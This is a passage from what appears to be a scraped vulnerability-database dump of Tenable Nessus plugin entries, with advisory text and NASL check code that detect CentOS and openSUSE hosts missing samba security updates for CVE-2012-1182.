script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:39", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.", "edition": 25, "published": "2012-04-11T00:00:00", "title": "CentOS 5 / 6 : samba (CESA-2012:0465)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-11T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libsmbclient-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:samba-winbind-devel"], "id": "CENTOS_RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465 and \n# CentOS Errata and Security Advisory 2012:0465 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58663);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"CentOS 5 / 6 : samba (CESA-2012:0465)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d314040\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e85d5c5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:24:45", "description": "Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-devel", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo", "p-cpe:/a:novell:opensuse:libldb-devel", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtdb1-32bit", "p-cpe:/a:novell:opensuse:libtevent0-32bit", "p-cpe:/a:novell:opensuse:libldb1", "p-cpe:/a:novell:opensuse:libldb1-debuginfo", "p-cpe:/a:novell:opensuse:libtdb-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libtdb1", "p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc-devel", "p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libldb1-32bit", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtalloc2", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libtevent-devel", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo", "p-cpe:/a:novell:opensuse:libtevent0", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:ldapsmb", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbsharemodes-devel", "p-cpe:/a:novell:opensuse:libsmbsharemodes0", "p-cpe:/a:novell:opensuse:samba-krb-printing", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libtalloc2-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-debuginfo"], "id": "OPENSUSE-2012-224.NASL", "href": "https://www.tenable.com/plugins/nessus/74601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-224.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74601);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)\");\n script_summary(english:\"Check for the openSUSE-2012-224 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-04/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ldapsmb-1.34b-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb-devel-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-debuginfo-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc-devel-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 